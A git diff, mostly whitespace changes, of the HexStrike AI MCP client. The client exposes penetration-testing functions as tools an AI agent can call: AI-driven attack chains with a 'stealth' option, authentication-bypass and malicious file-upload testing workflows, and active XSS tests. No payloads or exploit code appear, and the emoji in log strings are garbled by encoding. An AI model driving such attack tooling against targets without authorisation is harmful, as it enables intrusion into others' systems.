vulnerabilities discovered execution_time: Total execution time in seconds findings: Additional findings or notes - + Returns: Beautiful scan summary report with visual enhancements """ logger.info(f"๐Ÿ“Š Creating scan summary for {target}") - + tools_list = [tool.strip() for tool in tools_used.split(",")] - + summary_data = { "target": target, "tools_used": tools_list, @@ -4527,31 +4534,31 @@ def setup_mcp_server(hexstrike_client: HexStrikeClient) -> FastMCP: "vulnerabilities": [{"severity": "info"}] * vulnerabilities_found, # Mock data for count "findings": findings } - + result = hexstrike_client.safe_post("api/visual/summary-report", summary_data) if result.get("success"): logger.info("โœ… Scan summary created successfully") else: logger.error("โŒ Failed to create scan summary") - + return result @mcp.tool() def display_system_metrics() -> Dict[str, Any]: """ Display current system metrics and performance indicators with visual formatting. - + Returns: System metrics with beautiful visual presentation """ logger.info("๐Ÿ“ˆ Fetching system metrics") - + # Get telemetry data telemetry_result = hexstrike_client.safe_get("api/telemetry") - + if telemetry_result.get("success", True): logger.info("โœ… System metrics retrieved successfully") - + # Format the metrics for better display metrics = telemetry_result.get("system_metrics", {}) stats = { @@ -4562,7 +4569,7 @@ def setup_mcp_server(hexstrike_client: HexStrikeClient) -> FastMCP: "commands_executed": telemetry_result.get("commands_executed", 0), "success_rate": telemetry_result.get("success_rate", "0%") } - + return { "success": True, "metrics": stats, @@ -4584,155 +4591,155 @@ def setup_mcp_server(hexstrike_client: HexStrikeClient) -> FastMCP: # ============================================================================ # INTELLIGENT DECISION ENGINE TOOLS # ============================================================================ - + @mcp.tool() def analyze_target_intelligence(target: str) -> Dict[str, Any]: """ Analyze target using AI-powered intelligence to create comprehensive profile. - + Args: target: Target URL, IP address, or domain to analyze - + Returns: Comprehensive target profile with technology detection, risk assessment, and recommendations """ logger.info(f"๐Ÿง  Analyzing target intelligence for: {target}") - + data = {"target": target} result = hexstrike_client.safe_post("api/intelligence/analyze-target", data) - + if result.get("success"): profile = result.get("target_profile", {}) logger.info(f"โœ… Target analysis completed - Type: {profile.get('target_type')}, Risk: {profile.get('risk_level')}") else: logger.error(f"โŒ Target analysis failed for {target}") - + return result @mcp.tool() def select_optimal_tools_ai(target: str, objective: str = "comprehensive") -> Dict[str, Any]: """ Use AI to select optimal security tools based on target analysis and testing objective. - + Args: target: Target to analyze objective: Testing objective - "comprehensive", "quick", or "stealth" - + Returns: AI-selected optimal tools with effectiveness ratings and target profile """ logger.info(f"๐ŸŽฏ Selecting optimal tools for {target} with objective: {objective}") - + data = { "target": target, "objective": objective } result = hexstrike_client.safe_post("api/intelligence/select-tools", data) - + if result.get("success"): tools = result.get("selected_tools", []) logger.info(f"โœ… AI selected {len(tools)} optimal tools: {', '.join(tools[:3])}{'...' if len(tools) > 3 else ''}") else: logger.error(f"โŒ Tool selection failed for {target}") - + return result @mcp.tool() def optimize_tool_parameters_ai(target: str, tool: str, context: str = "{}") -> Dict[str, Any]: """ Use AI to optimize tool parameters based on target profile and context. - + Args: target: Target to test tool: Security tool to optimize context: JSON string with additional context (stealth, aggressive, etc.) - + Returns: AI-optimized parameters for maximum effectiveness """ import json - + logger.info(f"โš™๏ธ Optimizing parameters for {tool} against {target}") - + try: context_dict = json.loads(context) if context != "{}" else {} except: context_dict = {} - + data = { "target": target, "tool": tool, "context": context_dict } result = hexstrike_client.safe_post("api/intelligence/optimize-parameters", data) - + if result.get("success"): params = result.get("optimized_parameters", {}) logger.info(f"โœ… Parameters optimized for {tool} - {len(params)} parameters configured") else: logger.error(f"โŒ Parameter optimization failed for {tool}") - + return result @mcp.tool() def create_attack_chain_ai(target: str, objective: str = "comprehensive") -> Dict[str, Any]: """ Create an intelligent attack chain using AI-driven tool sequencing and optimization. - + Args: target: Target for the attack chain objective: Attack objective - "comprehensive", "quick", or "stealth" - + Returns: AI-generated attack chain with success probability and time estimates """ logger.info(f"โš”๏ธ Creating AI-driven attack chain for {target}") - + data = { "target": target, "objective": objective } result = hexstrike_client.safe_post("api/intelligence/create-attack-chain", data) - + if result.get("success"): chain = result.get("attack_chain", {}) steps = len(chain.get("steps", [])) success_prob = chain.get("success_probability", 0) estimated_time = chain.get("estimated_time", 0) - + logger.info(f"โœ… Attack chain created - {steps} steps, {success_prob:.2f} success probability, ~{estimated_time}s") else: logger.error(f"โŒ Attack chain creation failed for {target}") - + return result @mcp.tool() def intelligent_smart_scan(target: str, objective: str = "comprehensive", max_tools: int = 5) -> Dict[str, Any]: """ Execute an intelligent scan using AI-driven tool selection and parameter optimization. - + Args: target: Target to scan objective: Scanning objective - "comprehensive", "quick", or "stealth" max_tools: Maximum number of tools to use - + Returns: Results from AI-optimized scanning with tool execution summary """ logger.info(f"{HexStrikeColors.FIRE_RED}๐Ÿš€ Starting intelligent smart scan for {target}{HexStrikeColors.RESET}") - + data = { "target": target, "objective": objective, "max_tools": max_tools } result = hexstrike_client.safe_post("api/intelligence/smart-scan", data) - + if result.get("success"): scan_results = result.get("scan_results", {}) tools_executed = scan_results.get("tools_executed", []) execution_summary = scan_results.get("execution_summary", {}) - + # Enhanced logging with detailed results logger.info(f"{HexStrikeColors.SUCCESS}โœ… Intelligent scan completed for {target}{HexStrikeColors.RESET}") logger.info(f"{HexStrikeColors.CYBER_ORANGE}๐Ÿ“Š Execution Summary:{HexStrikeColors.RESET}") @@ -4740,96 +4747,96 @@ def setup_mcp_server(hexstrike_client: HexStrikeClient) -> FastMCP: logger.info(f" โ€ข Success rate: {execution_summary.get('success_rate', 0):.1f}%") logger.info(f" โ€ข Total vulnerabilities: {scan_results.get('total_vulnerabilities', 0)}") logger.info(f" โ€ข Execution time: {execution_summary.get('total_execution_time', 0):.2f}s") - + # Log successful tools successful_tools = [t['tool'] for t in tools_executed if t.get('success')] if successful_tools: logger.info(f"{HexStrikeColors.HIGHLIGHT_GREEN} Successful tools: {', '.join(successful_tools)} {HexStrikeColors.RESET}") - + # Log failed tools failed_tools = [t['tool'] for t in tools_executed if not t.get('success')] if failed_tools: logger.warning(f"{HexStrikeColors.HIGHLIGHT_RED} Failed tools: {', '.join(failed_tools)} {HexStrikeColors.RESET}") - + # Log vulnerabilities found if scan_results.get('total_vulnerabilities', 0) > 0: logger.warning(f"{HexStrikeColors.VULN_HIGH}๐Ÿšจ {scan_results['total_vulnerabilities']} vulnerabilities detected!{HexStrikeColors.RESET}") else: logger.error(f"{HexStrikeColors.ERROR}โŒ Intelligent scan failed for {target}: {result.get('error', 'Unknown error')}{HexStrikeColors.RESET}") - + return result @mcp.tool() def detect_technologies_ai(target: str) -> Dict[str, Any]: """ Use AI to detect technologies and provide technology-specific testing recommendations. - + Args: target: Target to analyze for technology detection - + Returns: Detected technologies with AI-generated testing recommendations """ logger.info(f"๐Ÿ” Detecting technologies for {target}") - + data = {"target": target} result = hexstrike_client.safe_post("api/intelligence/technology-detection", data) - + if result.get("success"): technologies = result.get("detected_technologies", []) cms = result.get("cms_type") recommendations = result.get("technology_recommendations", {}) - + tech_info = f"Technologies: {', '.join(technologies)}" if cms: tech_info += f", CMS: {cms}" - + logger.info(f"โœ… Technology detection completed - {tech_info}") logger.info(f"๐Ÿ“‹ Generated {len(recommendations)} technology-specific recommendations") else: logger.error(f"โŒ Technology detection failed for {target}") - + return result @mcp.tool() def ai_reconnaissance_workflow(target: str, depth: str = "standard") -> Dict[str, Any]: """ Execute AI-driven reconnaissance workflow with intelligent tool chaining. - + Args: target: Target for reconnaissance depth: Reconnaissance depth - "surface", "standard", or "deep" - + Returns: Comprehensive reconnaissance results with AI-driven insights """ logger.info(f"๐Ÿ•ต๏ธ Starting AI reconnaissance workflow for {target} (depth: {depth})") - + # First analyze the target analysis_result = hexstrike_client.safe_post("api/intelligence/analyze-target", {"target": target}) - + if not analysis_result.get("success"): return analysis_result - + # Create attack chain for reconnaissance objective = "comprehensive" if depth == "deep" else "quick" if depth == "surface" else "comprehensive" chain_result = hexstrike_client.safe_post("api/intelligence/create-attack-chain", { "target": target, "objective": objective }) - + if not chain_result.get("success"): return chain_result - + # Execute the reconnaissance scan_result = hexstrike_client.safe_post("api/intelligence/smart-scan", { "target": target, "objective": objective, "max_tools": 8 if depth == "deep" else 3 if depth == "surface" else 5 }) - + logger.info(f"โœ… AI reconnaissance workflow completed for {target}") - + return { "success": True, "target": target, @@ -4844,25 +4851,25 @@ def setup_mcp_server(hexstrike_client: HexStrikeClient) -> FastMCP: def ai_vulnerability_assessment(target: str, focus_areas: str = "all") -> Dict[str, Any]: """ Perform AI-driven vulnerability assessment with intelligent prioritization. - + Args: target: Target for vulnerability assessment focus_areas: Comma-separated focus areas - "web", "network", "api", "all" - + Returns: Prioritized vulnerability assessment results with AI insights """ logger.info(f"๐Ÿ”ฌ Starting AI vulnerability assessment for {target}") - + # Analyze target first analysis_result = hexstrike_client.safe_post("api/intelligence/analyze-target", {"target": target}) - + if not analysis_result.get("success"): return analysis_result - + profile = analysis_result.get("target_profile", {}) target_type = profile.get("target_type", "unknown") - + # Select tools based on focus areas and target type if focus_areas == "all": objective = "comprehensive" @@ -4872,16 +4879,16 @@ def setup_mcp_server(hexstrike_client: HexStrikeClient) -> FastMCP: objective = "comprehensive" else: objective = "quick" - + # Execute vulnerability assessment scan_result = hexstrike_client.safe_post("api/intelligence/smart-scan", { "target": target, "objective": objective, "max_tools": 6 }) - + logger.info(f"โœ… AI vulnerability assessment completed for {target}") - + return { "success": True, "target": target, @@ -4901,17 +4908,17 @@ def setup_mcp_server(hexstrike_client: HexStrikeClient) -> FastMCP: # ============================================================================ @mcp.tool() - def bugbounty_reconnaissance_workflow(domain: str, scope: str = "", out_of_scope: str = "", + def bugbounty_reconnaissance_workflow(domain: str, scope: str = "", out_of_scope: str = "", program_type: str = "web") -> Dict[str, Any]: """ Create comprehensive reconnaissance workflow for bug bounty hunting. - + Args: domain: Target domain for bug bounty scope: Comma-separated list of in-scope domains/IPs out_of_scope: Comma-separated list of out-of-scope domains/IPs program_type: Type of program (web, api, mobile, iot) - + Returns: Comprehensive reconnaissance workflow with phases and tools """ @@ -4921,29 +4928,29 @@ def setup_mcp_server(hexstrike_client: HexStrikeClient) -> FastMCP: "out_of_scope": out_of_scope.split(",") if out_of_scope else [], "program_type": program_type } - + logger.info(f"๐ŸŽฏ Creating reconnaissance workflow for {domain}") result = hexstrike_client.safe_post("api/bugbounty/reconnaissance-workflow", data) - + if result.get("success"): workflow = result.get("workflow", {}) logger.info(f"โœ… Reconnaissance workflow created - {workflow.get('tools_count', 0)} tools, ~{workflow.get('estimated_time', 0)}s") else: logger.error(f"โŒ Failed to create reconnaissance workflow for {domain}") - + return result @mcp.tool() - def bugbounty_vulnerability_hunting(domain: str, priority_vulns: str = "rce,sqli,xss,idor,ssrf", + def bugbounty_vulnerability_hunting(domain: str, priority_vulns: str = "rce,sqli,xss,idor,ssrf", bounty_range: str = "unknown") -> Dict[str, Any]: """ Create vulnerability hunting workflow prioritized by impact and bounty potential. - + Args: domain: Target domain for bug bounty priority_vulns: Comma-separated list of priority vulnerability types bounty_range: Expected bounty range (low, medium, high, critical) - + Returns: Vulnerability hunting workflow prioritized by impact """ @@ -4952,27 +4959,27 @@ def setup_mcp_server(hexstrike_client: HexStrikeClient) -> FastMCP: "priority_vulns": priority_vulns.split(",") if priority_vulns else [], "bounty_range": bounty_range } - + logger.info(f"๐ŸŽฏ Creating vulnerability hunting workflow for {domain}") result = hexstrike_client.safe_post("api/bugbounty/vulnerability-hunting-workflow", data) - + if result.get("success"): workflow = result.get("workflow", {}) logger.info(f"โœ… Vulnerability hunting workflow created - Priority score: {workflow.get('priority_score', 0)}") else: logger.error(f"โŒ Failed to create vulnerability hunting workflow for {domain}") - + return result @mcp.tool() def bugbounty_business_logic_testing(domain: str, program_type: str = "web") -> Dict[str, Any]: """ Create business logic testing workflow for advanced bug bounty hunting. - + Args: domain: Target domain for bug bounty program_type: Type of program (web, api, mobile) - + Returns: Business logic testing workflow with manual and automated tests """ @@ -4980,84 +4987,84 @@ def setup_mcp_server(hexstrike_client: HexStrikeClient) -> FastMCP: "domain": domain, "program_type": program_type } - + logger.info(f"๐ŸŽฏ Creating business logic testing workflow for {domain}") result = hexstrike_client.safe_post("api/bugbounty/business-logic-workflow", data) - + if result.get("success"): workflow = result.get("workflow", {}) test_count = sum(len(category["tests"]) for category in workflow.get("business_logic_tests", [])) logger.info(f"โœ… Business logic testing workflow created - {test_count} tests") else: logger.error(f"โŒ Failed to create business logic testing workflow for {domain}") - + return result @mcp.tool() def bugbounty_osint_gathering(domain: str) -> Dict[str, Any]: """ Create OSINT (Open Source Intelligence) gathering workflow for bug bounty reconnaissance. - + Args: domain: Target domain for OSINT gathering - + Returns: OSINT gathering workflow with multiple intelligence phases """ data = {"domain": domain} - + logger.info(f"๐ŸŽฏ Creating OSINT gathering workflow for {domain}") result = hexstrike_client.safe_post("api/bugbounty/osint-workflow", data) - + if result.get("success"): workflow = result.get("workflow", {}) phases = len(workflow.get("osint_phases", [])) logger.info(f"โœ… OSINT workflow created - {phases} intelligence phases") else: logger.error(f"โŒ Failed to create OSINT workflow for {domain}") - + return result @mcp.tool() def bugbounty_file_upload_testing(target_url: str) -> Dict[str, Any]: """ Create file upload vulnerability testing workflow with bypass techniques. - + Args: target_url: Target URL with file upload functionality - + Returns: File upload testing workflow with malicious files and bypass techniques """ data = {"target_url": target_url} - + logger.info(f"๐ŸŽฏ Creating file upload testing workflow for {target_url}") result = hexstrike_client.safe_post("api/bugbounty/file-upload-testing", data) - + if result.get("success"): workflow = result.get("workflow", {}) phases = len(workflow.get("test_phases", [])) logger.info(f"โœ… File upload testing workflow created - {phases} test phases") else: logger.error(f"โŒ Failed to create file upload testing workflow for {target_url}") - + return result @mcp.tool() - def bugbounty_comprehensive_assessment(domain: str, scope: str = "", + def bugbounty_comprehensive_assessment(domain: str, scope: str = "", priority_vulns: str = "rce,sqli,xss,idor,ssrf", - include_osint: bool = True, + include_osint: bool = True, include_business_logic: bool = True) -> Dict[str, Any]: """ Create comprehensive bug bounty assessment combining all specialized workflows. - + Args: domain: Target domain for bug bounty scope: Comma-separated list of in-scope domains/IPs priority_vulns: Comma-separated list of priority vulnerability types include_osint: Include OSINT gathering workflow include_business_logic: Include business logic testing workflow - + Returns: Comprehensive bug bounty assessment with all workflows and summary """ @@ -5068,28 +5075,28 @@ def setup_mcp_server(hexstrike_client: HexStrikeClient) -> FastMCP: "include_osint": include_osint, "include_business_logic": include_business_logic } - + logger.info(f"๐ŸŽฏ Creating comprehensive bug bounty assessment for {domain}") result = hexstrike_client.safe_post("api/bugbounty/comprehensive-assessment", data) - + if result.get("success"): assessment = result.get("assessment", {}) summary = assessment.get("summary", {}) logger.info(f"โœ… Comprehensive assessment created - {summary.get('workflow_count', 0)} workflows, ~{summary.get('total_estimated_time', 0)}s") else: logger.error(f"โŒ Failed to create comprehensive assessment for {domain}") - + return result @mcp.tool() def bugbounty_authentication_bypass_testing(target_url: str, auth_type: str = "form") -> Dict[str, Any]: """ Create authentication bypass testing workflow for bug bounty hunting. - + Args: target_url: Target URL with authentication auth_type: Type of authentication (form, jwt, oauth, saml) - + Returns: Authentication bypass testing strategies and techniques """ @@ -5119,7 +5126,7 @@ def setup_mcp_server(hexstrike_client: HexStrikeClient) -> FastMCP: {"technique": "Signature Bypass", "description": "Test signature validation bypass"} ] } - + workflow = { "target": target_url, "auth_type": auth_type, @@ -5133,9 +5140,9 @@ def setup_mcp_server(hexstrike_client: HexStrikeClient) -> FastMCP: "estimated_time": 240, "manual_testing_required": True } - + logger.info(f"๐ŸŽฏ Created authentication bypass testing workflow for {target_url}") - + return { "success": True, "workflow": workflow, @@ -5145,13 +5152,13 @@ def setup_mcp_server(hexstrike_client: HexStrikeClient) -> FastMCP: # ============================================================================ # ENHANCED HTTP TESTING FRAMEWORK & BROWSER AGENT (BURP SUITE ALTERNATIVE) # ============================================================================ - + @mcp.tool() - def http_framework_test(url: str, method: str = "GET", data: dict = {}, + def http_framework_test(url: str, method: str = "GET", data: dict = {}, headers: dict = {}, cookies: dict = {}, action: str = "request") -> Dict[str, Any]: """ Enhanced HTTP testing framework (Burp Suite alternative) for comprehensive web security testing. - + Args: url: Target URL to test method: HTTP method (GET, POST, PUT, DELETE, etc.) @@ -5159,7 +5166,7 @@ def setup_mcp_server(hexstrike_client: HexStrikeClient) -> FastMCP: headers: Custom headers cookies: Custom cookies action: Action to perform (request, spider, proxy_history, set_rules, set_scope, repeater, intruder) - + Returns: HTTP testing results with vulnerability analysis """ @@ -5171,28 +5178,28 @@ def setup_mcp_server(hexstrike_client: HexStrikeClient) -> FastMCP: "cookies": cookies, "action": action } - + logger.info(f"{HexStrikeColors.FIRE_RED}๐Ÿ”ฅ Starting HTTP Framework {action}: {url}{HexStrikeColors.RESET}") result = hexstrike_client.safe_post("api/tools/http-framework", data_payload) - + if result.get("success"): logger.info(f"{HexStrikeColors.SUCCESS}โœ… HTTP Framework {action} completed for {url}{HexStrikeColors.RESET}") - + # Enhanced logging for vulnerabilities found if result.get("result", {}).get("vulnerabilities"): vuln_count = len(result["result"]["vulnerabilities"]) logger.info(f"{HexStrikeColors.HIGHLIGHT_RED} Found {vuln_count} potential vulnerabilities {HexStrikeColors.RESET}") else: logger.error(f"{HexStrikeColors.ERROR}โŒ HTTP Framework {action} failed for {url}{HexStrikeColors.RESET}") - + return result @mcp.tool() - def browser_agent_inspect(url: str, headless: bool = True, wait_time: int = 5, + def browser_agent_inspect(url: str, headless: bool = True, wait_time: int = 5, action: str = "navigate", proxy_port: int = None, active_tests: bool = False) -> Dict[str, Any]: """ AI-powered browser agent for comprehensive web application inspection and security analysis. - + Args: url: Target URL to inspect headless: Run browser in headless mode @@ -5200,7 +5207,7 @@ def setup_mcp_server(hexstrike_client: HexStrikeClient) -> FastMCP: action: Action to perform (navigate, screenshot, close, status) proxy_port: Optional proxy port for request interception active_tests: Run lightweight active reflected XSS tests (safe GET-only) - + Returns: Browser inspection results with security analysis """ @@ -5212,26 +5219,26 @@ def setup_mcp_server(hexstrike_client: HexStrikeClient) -> FastMCP: "proxy_port": proxy_port, "active_tests": active_tests } - + logger.info(f"{HexStrikeColors.CRIMSON}๐ŸŒ Starting Browser Agent {action}: {url}{HexStrikeColors.RESET}") result = hexstrike_client.safe_post("api/tools/browser-agent", data_payload) - + if result.get("success"): logger.info(f"{HexStrikeColors.SUCCESS}โœ… Browser Agent {action} completed for {url}{HexStrikeColors.RESET}") - + # Enhanced logging for security analysis if action == "navigate" and result.get("result", {}).get("security_analysis"): security_analysis = result["result"]["security_analysis"] issues_count = security_analysis.get("total_issues", 0) security_score = security_analysis.get("security_score", 0) - + if issues_count > 0: logger.warning(f"{HexStrikeColors.HIGHLIGHT_YELLOW} Security Issues: {issues_count} | Score: {security_score}/100 {HexStrikeColors.RESET}") else: logger.info(f"{HexStrikeColors.HIGHLIGHT_GREEN} No security issues found | Score: {security_score}/100 {HexStrikeColors.RESET}") else: logger.error(f"{HexStrikeColors.ERROR}โŒ Browser Agent {action} failed for {url}{HexStrikeColors.RESET}") - + return result # ---------------- Additional HTTP Framework Tools (sync with server) ---------------- @@ -5272,19 +5279,19 @@ def setup_mcp_server(hexstrike_client: HexStrikeClient) -> FastMCP: return hexstrike_client.safe_post("api/tools/http-framework", payload) @mcp.tool() - def burpsuite_alternative_scan(target: str, scan_type: str = "comprehensive", - headless: bool = True, max_depth: int = 3, + def burpsuite_alternative_scan(target: str, scan_type: str = "comprehensive", + headless: bool = True, max_depth: int = 3, max_pages: int = 50) -> Dict[str, Any]: """ Comprehensive Burp Suite alternative combining HTTP framework and browser agent for complete web security testing. - + Args: target: Target URL or domain to scan scan_type: Type of scan (comprehensive, spider, passive, active) headless: Run browser in headless mode max_depth: Maximum crawling depth max_pages: Maximum pages to analyze - + Returns: Comprehensive security assessment results """ @@ -5295,25 +5302,25 @@ def setup_mcp_server(hexstrike_client: HexStrikeClient) -> FastMCP: "max_depth": max_depth, "max_pages": max_pages } - + logger.info(f"{HexStrikeColors.BLOOD_RED}๐Ÿ”ฅ Starting Burp Suite Alternative {scan_type} scan: {target}{HexStrikeColors.RESET}") result = hexstrike_client.safe_post("api/tools/burpsuite-alternative", data_payload) - + if result.get("success"): logger.info(f"{HexStrikeColors.SUCCESS}โœ… Burp Suite Alternative scan completed for {target}{HexStrikeColors.RESET}") - + # Enhanced logging for comprehensive results if result.get("result", {}).get("summary"): summary = result["result"]["summary"] total_vulns = summary.get("total_vulnerabilities", 0) pages_analyzed = summary.get("pages_analyzed", 0) security_score = summary.get("security_score", 0) - + logger.info(f"{HexStrikeColors.HIGHLIGHT_BLUE} SCAN SUMMARY {HexStrikeColors.RESET}") logger.info(f" ๐Ÿ“Š Pages Analyzed: {pages_analyzed}") logger.info(f" ๐Ÿšจ Vulnerabilities: {total_vulns}") logger.info(f" ๐Ÿ›ก๏ธ Security Score: {security_score}/100") - + # Log vulnerability breakdown vuln_breakdown = summary.get("vulnerability_breakdown", {}) for severity, count in vuln_breakdown.items(): @@ -5325,33 +5332,33 @@ def setup_mcp_server(hexstrike_client: HexStrikeClient) -> FastMCP: 'low': HexStrikeColors.YELLOW, 'info': HexStrikeColors.INFO }.get(severity.lower(), HexStrikeColors.WHITE) - + logger.info(f" {color}{severity.upper()}: {count}{HexStrikeColors.RESET}") else: logger.error(f"{HexStrikeColors.ERROR}โŒ Burp Suite Alternative scan failed for {target}{HexStrikeColors.RESET}") - + return result @mcp.tool() def error_handling_statistics() -> Dict[str, Any]: """ Get intelligent error handling system statistics and recent error patterns. - + Returns: Error handling statistics and patterns """ logger.info(f"{HexStrikeColors.ELECTRIC_PURPLE}๐Ÿ“Š Retrieving error handling statistics{HexStrikeColors.RESET}") result = hexstrike_client.safe_get("api/error-handling/statistics") - + if result.get("success"): stats = result.get("statistics", {}) total_errors = stats.get("total_errors", 0) recent_errors = stats.get("recent_errors_count", 0) - + logger.info(f"{HexStrikeColors.SUCCESS}โœ… Error statistics retrieved{HexStrikeColors.RESET}") logger.info(f" ๐Ÿ“ˆ Total Errors: {total_errors}") logger.info(f" ๐Ÿ•’ Recent Errors: {recent_errors}") - + # Log error breakdown by type error_counts = stats.get("error_counts_by_type", {}) if error_counts: @@ -5360,20 +5367,20 @@ def setup_mcp_server(hexstrike_client: HexStrikeClient) -> FastMCP: logger.info(f" {HexStrikeColors.FIRE_RED}{error_type}: {count}{HexStrikeColors.RESET}") else: logger.error(f"{HexStrikeColors.ERROR}โŒ Failed to retrieve error statistics{HexStrikeColors.RESET}") - + return result @mcp.tool() - def test_error_recovery(tool_name: str, error_type: str = "timeout", + def test_error_recovery(tool_name: str, error_type: str = "timeout", target: str = "example.com") -> Dict[str, Any]: """ Test the intelligent error recovery system with simulated failures. - + Args: tool_name: Name of tool to simulate error for error_type: Type of error to simulate (timeout, permission_denied, network_unreachable, etc.) target: Target for the simulated test - + Returns: Recovery strategy and system response """ @@ -5382,26 +5389,26 @@ def setup_mcp_server(hexstrike_client: HexStrikeClient) -> FastMCP: "error_type": error_type, "target": target } - + logger.info(f"{HexStrikeColors.RUBY}๐Ÿงช Testing error recovery for {tool_name} with {error_type}{HexStrikeColors.RESET}") result = hexstrike_client.safe_post("api/error-handling/test-recovery", data_payload) - + if result.get("success"): recovery_strategy = result.get("recovery_strategy", {}) action = recovery_strategy.get("action", "unknown") success_prob = recovery_strategy.get("success_probability", 0) - + logger.info(f"{HexStrikeColors.SUCCESS}โœ… Error recovery test completed{HexStrikeColors.RESET}") logger.info(f" ๐Ÿ”ง Recovery Action: {action}") logger.info(f" ๐Ÿ“Š Success Probability: {success_prob:.2%}") - + # Log alternative tools if available alternatives = result.get("alternative_tools", []) if alternatives: logger.info(f" ๐Ÿ”„ Alternative Tools: {', '.join(alternatives)}") else: logger.error(f"{HexStrikeColors.ERROR}โŒ Error recovery test failed{HexStrikeColors.RESET}") - + return result return mcp @@ -5409,7 +5416,7 @@ def setup_mcp_server(hexstrike_client: HexStrikeClient) -> FastMCP: def parse_args(): """Parse command line arguments.""" parser = argparse.ArgumentParser(description="Run the HexStrike AI MCP Client") - parser.add_argument("--server", type=str, default=DEFAULT_HEXSTRIKE_SERVER, + parser.add_argument("--server", type=str, default=DEFAULT_HEXSTRIKE_SERVER, help=f"HexStrike AI API server URL (default: {DEFAULT_HEXSTRIKE_SERVER})") parser.add_argument("--timeout", type=int, default=DEFAULT_REQUEST_TIMEOUT, help=f"Request timeout in seconds (default: {DEFAULT_REQUEST_TIMEOUT})") @@ -5419,20 +5426,20 @@ def parse_args(): def main(): """Main entry point for the MCP server.""" args = parse_args() - + # Configure logging based on debug flag if args.debug: logger.setLevel(logging.DEBUG) logger.debug("๐Ÿ” Debug logging enabled") - + # MCP compatibility: No banner output to avoid JSON parsing issues logger.info(f"๐Ÿš€ Starting HexStrike AI MCP Client v6.0") logger.info(f"๐Ÿ”— Connecting to: {args.server}") - + try: # Initialize the HexStrike AI client hexstrike_client = HexStrikeClient(args.server, args.timeout) - + # Check server health and log the result health = hexstrike_client.check_health() if "error" in health: @@ -5447,7 +5454,7 @@ def main(): missing_tools = [tool for tool, available in health.get("tools_status", {}).items() if not available] if missing_tools: logger.warning(f"โŒ Missing tools: {', '.join(missing_tools[:5])}{'...' if len(missing_tools) > 5 else ''}") - + # Set up and run the MCP server mcp = setup_mcp_server(hexstrike_client) logger.info("๐Ÿš€ Starting HexStrike AI MCP server") @@ -5460,4 +5467,4 @@ def main(): sys.exit(1) if __name__ == "__main__": - main() \ No newline at end of file + main() diff --git a/hexstrike_server.py b/hexstrike_server.py index ba01649..bd66d24 100644 --- a/hexstrike_server.py +++ b/hexstrike_server.py @@ -104,11 +104,11 @@ API_HOST = os.environ.get('HEXSTRIKE_HOST', '127.0.0.1') class ModernVisualEngine: """Beautiful, modern output formatting with animations and colors""" - + # Enhanced color palette with reddish tones and better highlighting COLORS = { 'MATRIX_GREEN': '\033[38;5;46m', - 'NEON_BLUE': '\033[38;5;51m', + 'NEON_BLUE': '\033[38;5;51m', 'ELECTRIC_PURPLE': '\033[38;5;129m', 'CYBER_ORANGE': '\033[38;5;208m', 'HACKER_RED': '\033[38;5;196m', @@ -161,7 +161,7 @@ class ModernVisualEngine: 'SPINNER': '\033[38;5;51m', # Cyan 'PULSE': '\033[38;5;196m\033[5m' # Blinking red } - + # Progress animation styles PROGRESS_STYLES = { 'dots': ['โ ‹', 'โ ™', 'โ น', 'โ ธ', 'โ ผ', 'โ ด', 'โ ฆ', 'โ ง', 'โ ‡', 'โ '], @@ -169,7 +169,7 @@ class ModernVisualEngine: 'arrows': ['โ†', 'โ†–', 'โ†‘', 'โ†—', 'โ†’', 'โ†˜', 'โ†“', 'โ†™'], 'pulse': ['โ—', 'โ—', 'โ—‘', 'โ—’', 'โ—“', 'โ—”', 'โ—•', 'โ—–', 'โ——', 'โ—˜'] } - + @staticmethod def create_banner() -> str: """Create the enhanced HexStrike banner""" @@ -184,8 +184,8 @@ class ModernVisualEngine: {title_block} โ–ˆโ–ˆโ•— โ–ˆโ–ˆโ•—โ–ˆโ–ˆโ–ˆโ–ˆโ–ˆโ–ˆโ–ˆโ•—โ–ˆโ–ˆโ•— โ–ˆโ–ˆโ•—โ–ˆโ–ˆโ–ˆโ–ˆโ–ˆโ–ˆโ–ˆโ•—โ–ˆโ–ˆโ–ˆโ–ˆโ–ˆโ–ˆโ–ˆโ–ˆโ•—โ–ˆโ–ˆโ–ˆโ–ˆโ–ˆโ–ˆโ•— โ–ˆโ–ˆโ•—โ–ˆโ–ˆโ•— โ–ˆโ–ˆโ•—โ–ˆโ–ˆโ–ˆโ–ˆโ–ˆโ–ˆโ–ˆโ•— โ–ˆโ–ˆโ•‘ โ–ˆโ–ˆโ•‘โ–ˆโ–ˆโ•”โ•โ•โ•โ•โ•โ•šโ–ˆโ–ˆโ•—โ–ˆโ–ˆโ•”โ•โ–ˆโ–ˆโ•”โ•โ•โ•โ•โ•โ•šโ•โ•โ–ˆโ–ˆโ•”โ•โ•โ•โ–ˆโ–ˆโ•”โ•โ•โ–ˆโ–ˆโ•—โ–ˆโ–ˆโ•‘โ–ˆโ–ˆโ•‘ โ–ˆโ–ˆโ•”โ•โ–ˆโ–ˆโ•”โ•โ•โ•โ•โ• -โ–ˆโ–ˆโ–ˆโ–ˆโ–ˆโ–ˆโ–ˆโ•‘โ–ˆโ–ˆโ–ˆโ–ˆโ–ˆโ•— โ•šโ–ˆโ–ˆโ–ˆโ•”โ• โ–ˆโ–ˆโ–ˆโ–ˆโ–ˆโ–ˆโ–ˆโ•— โ–ˆโ–ˆโ•‘ โ–ˆโ–ˆโ–ˆโ–ˆโ–ˆโ–ˆโ•”โ•โ–ˆโ–ˆโ•‘โ–ˆโ–ˆโ–ˆโ–ˆโ–ˆโ•”โ• โ–ˆโ–ˆโ–ˆโ–ˆโ–ˆโ•— -โ–ˆโ–ˆโ•”โ•โ•โ–ˆโ–ˆโ•‘โ–ˆโ–ˆโ•”โ•โ•โ• โ–ˆโ–ˆโ•”โ–ˆโ–ˆโ•— โ•šโ•โ•โ•โ•โ–ˆโ–ˆโ•‘ โ–ˆโ–ˆโ•‘ โ–ˆโ–ˆโ•”โ•โ•โ–ˆโ–ˆโ•—โ–ˆโ–ˆโ•‘โ–ˆโ–ˆโ•”โ•โ–ˆโ–ˆโ•— โ–ˆโ–ˆโ•”โ•โ•โ• +โ–ˆโ–ˆโ–ˆโ–ˆโ–ˆโ–ˆโ–ˆโ•‘โ–ˆโ–ˆโ–ˆโ–ˆโ–ˆโ•— โ•šโ–ˆโ–ˆโ–ˆโ•”โ• โ–ˆโ–ˆโ–ˆโ–ˆโ–ˆโ–ˆโ–ˆโ•— โ–ˆโ–ˆโ•‘ 